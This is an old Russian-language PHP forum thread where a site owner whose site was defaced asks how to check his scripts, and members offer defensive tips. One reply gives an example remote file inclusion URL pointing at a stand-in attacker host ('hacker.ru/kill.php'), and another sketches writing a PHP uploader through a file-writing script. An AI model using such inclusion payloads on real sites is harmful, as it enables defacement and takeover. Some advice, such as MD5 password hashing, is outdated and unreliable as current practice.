Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Проверка скрипта, Проверка скрипта 
:(
    Опции темы
Гость_Сергей
  Дата 14.7.2004, 08:42 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











Мой сайт несколько раз ломали, хостер говорит, что у меня дыра в пхп скриптах. Кто знает как можно проверить скрипты (подскажите прогу), или вохможные советы по безопастности. Спасибо!
  Вверх
Ignat
Дата 14.7.2004, 10:12 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Флудератор
****


Профиль
Группа: Экс. модератор
Сообщений: 4030
Регистрация: 19.4.2004
Где: غيليندزيك مدينة

Репутация: 10
Всего: 73



скрипты нужно писать под register_globals=off;
пароли хранить после шифровки MD5;
отслеживать типы файлов в аплоаде;
все данные которые постятся подвергать htmlspecialchars и addslashes;
для пущей безопасности можно вести в базе логи неудачных попыток ввода пароля, определять ip, частоту ввода пароля.

и просто не использовать элементарные пароли, типа qwerty, 1111.



--------------------
Теперь при чем :P
PM   Вверх
MuToGeN
Дата 14.7.2004, 11:32 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Лесник
****


Профиль
Группа: Модератор
Сообщений: 4379
Регистрация: 15.8.2002
Где: Москва

Репутация: 7
Всего: 32



Насчет программ - таких не знаю.
Если готовы заплатить за это денег, то можете обратиться с этим вопросом в раздел "работа".


--------------------
Three pings for the token rings,
Five pings for the UNIX machines,
Hundred pings for the broken links,
One special ping to check them all
Through Simple Network Management Protocol!
PM MAIL ICQ   Вверх
Secandr
Дата 14.7.2004, 12:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Связист
****


Профиль
Группа: Экс. модератор
Сообщений: 4043
Регистрация: 3.8.2003
Где: Russia, Volgograd

Репутация: 5
Всего: 39



Ignat
На моём сайте на админа стоял пароль qwerty и ничего за два года попыток, взлом не удался. А брутфорсили дай боже biggrin.gif

Гость_Сергей Хорошие советы дал Ignat, если опишите что и как ваша программа делает, то можно будет дать более подробные советы.

MuToGeN
Я видел такие программы, но работаю они скверно, даже не находят спеуиально оставленых дырок.


--------------------
Мышки плакали, кололись, но продолжали жрать кактусы (с) cisco
PM ICQ AOL   Вверх
MuToGeN
Дата 14.7.2004, 14:59 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Лесник
****


Профиль
Группа: Модератор
Сообщений: 4379
Регистрация: 15.8.2002
Где: Москва

Репутация: 7
Всего: 32



Secandr
пароль qwerty, а логин admin_VcK923MRpfKl ? =)

К тому, что посоветывал Ignat:
С большими проектами бывает полезно логировать ошибочные запросы и банить по IP, если таких запросов, например, больше 5 разных в минуту от одного клиента. Вполне можно сделать вывод, что тот ищет уязвимость с SQL инъекцией.


--------------------
Three pings for the token rings,
Five pings for the UNIX machines,
Hundred pings for the broken links,
One special ping to check them all
Through Simple Network Management Protocol!
PM MAIL ICQ   Вверх
Secandr
Дата 15.7.2004, 10:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Связист
****


Профиль
Группа: Экс. модератор
Сообщений: 4043
Регистрация: 3.8.2003
Где: Russia, Volgograd

Репутация: 5
Всего: 39



Ещё вариант: проверять $_GET и $_POST на лишние параметры и если они есть делать die. А если таких запросов много - банить ip.

MuToGeN
Логин был Secandr


--------------------
Мышки плакали, кололись, но продолжали жрать кактусы (с) cisco
PM ICQ AOL   Вверх
dm9
Дата 15.7.2004, 20:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Дмитрий Копытин
****


Профиль
Группа: Vingrad developer
Сообщений: 3876
Регистрация: 22.7.2002
Где: Москва

Репутация: 2
Всего: 137



PM MAIL ICQ   Вверх
Гость_Сергей
Дата 16.7.2004, 20:14 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











Спасибо всем, проблемма в том, что весь сайт написан на пхп и хакер каким то способом без подключения по фтп к серверу изменил картинки и содержание главной страницы, особых скриптов на сайте нет, только использовал пхп для создания верхушки и низа, потом везде вставлял. Еще сам написал новостную ленту с архивом, кто подскажет, как он смог закачать картинки без фтп. Жду, спасибо! exclamation.gif
  Вверх
Secandr
Дата 16.7.2004, 21:31 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Связист
****


Профиль
Группа: Экс. модератор
Сообщений: 4043
Регистрация: 3.8.2003
Где: Russia, Volgograd

Репутация: 5
Всего: 39



Твои скрипты в файлы пишут что-либо?
Если да, то как формируются имена этих файлов?
Если динамически, то переписывай скрипты.


--------------------
Мышки плакали, кололись, но продолжали жрать кактусы (с) cisco
PM ICQ AOL   Вверх
Гость_СЕргей
Дата 17.7.2004, 05:43 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











У меня база новостей текстовой файл!!!
  Вверх
Ripper
Дата 17.7.2004, 09:24 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Lonely soul...
**


Профиль
Группа: Участник
Сообщений: 920
Регистрация: 30.6.2004
Где: г. Москва

Репутация: 1
Всего: 23



ну если ссылка типа http://mysite.ru/index.php?news.php
то так нельзя. Если у тебя берется имя вставляемого файла из строки адреса то он может прописать http://mysite.ru/index.php?http://hacker.ru/kill.php типа того


--------------------
"Он знает: надо смеяться над тем, что тебя мучит, иначе не сохранишь равновесия, иначе мир сведет тебя с ума" - Над кукушкиным гнездом
PM MAIL ICQ   Вверх
Secandr
Дата 17.7.2004, 18:52 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Связист
****


Профиль
Группа: Экс. модератор
Сообщений: 4043
Регистрация: 3.8.2003
Где: Russia, Volgograd

Репутация: 5
Всего: 39



смысл в том, что если действия пользователя могут повлеять на имя файла и его содержимое, то злоумышленик просто создаст hack.php, а в него запишетнормаьлный аплоадерщик и будет менять всё на твоём сайте, да и на хосте сможет много чего натворить.


--------------------
Мышки плакали, кололись, но продолжали жрать кактусы (с) cisco
PM ICQ AOL   Вверх
dm9
Дата 17.7.2004, 22:03 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Дмитрий Копытин
****


Профиль
Группа: Vingrad developer
Сообщений: 3876
Регистрация: 22.7.2002
Где: Москва

Репутация: 2
Всего: 137



Гость_СЕргей, коли не коммерческая тайна и не больше сотни строк, кинь сюда скрипты, мне было бы интересно посмотреть. Может, и найдётся баг...
Добавлено @ 22:05
Да мы ж тут не ясновидящие, так гадать можно долго без кода...
PM MAIL ICQ   Вверх
LonelyWolf
Дата 7.9.2005, 09:49 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Awaiting Authorisation
Сообщений: 2
Регистрация: 31.8.2005
Где: Россия

Репутация: нет
Всего: нет



Да долго годать и не придёться...

1) Гость_Сергей, у тебя есть в админке где ты добовляешь новости upload например для картинок в новости?????

2) Доступ в админку по технологи отдельная страничка логин и пасс...в папке например admin
а пароль с логином храниться в отдельном файле в той же папке и имеет имя типа pass.dat =)

3) Как уже говорили у тебя происходит внешний инклуд файла с новостями в открытом виде...

Как в большинстве случаев.....поиметь такой сайт 1.5-3 минуты....

Да зачем просить выложить код....и что щас поможем исправим за него багу, а в следующий раз его сломают он опять кого-нибудь будет просить...надо самому....тогда и ошибок меньше будет...

Это сообщение отредактировал(а) LonelyWolf - 7.9.2005, 09:51
PM MAIL ICQ Jabber   Вверх
Ignat
Дата 7.9.2005, 13:49 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Флудератор
****


Профиль
Группа: Экс. модератор
Сообщений: 4030
Регистрация: 19.4.2004
Где: غيليندزيك مدينة

Репутация: 10
Всего: 73



LonelyWolf, ты б еще дольше думал smile
Больше года прошло.


--------------------
Теперь при чем :P
PM   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.0549 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.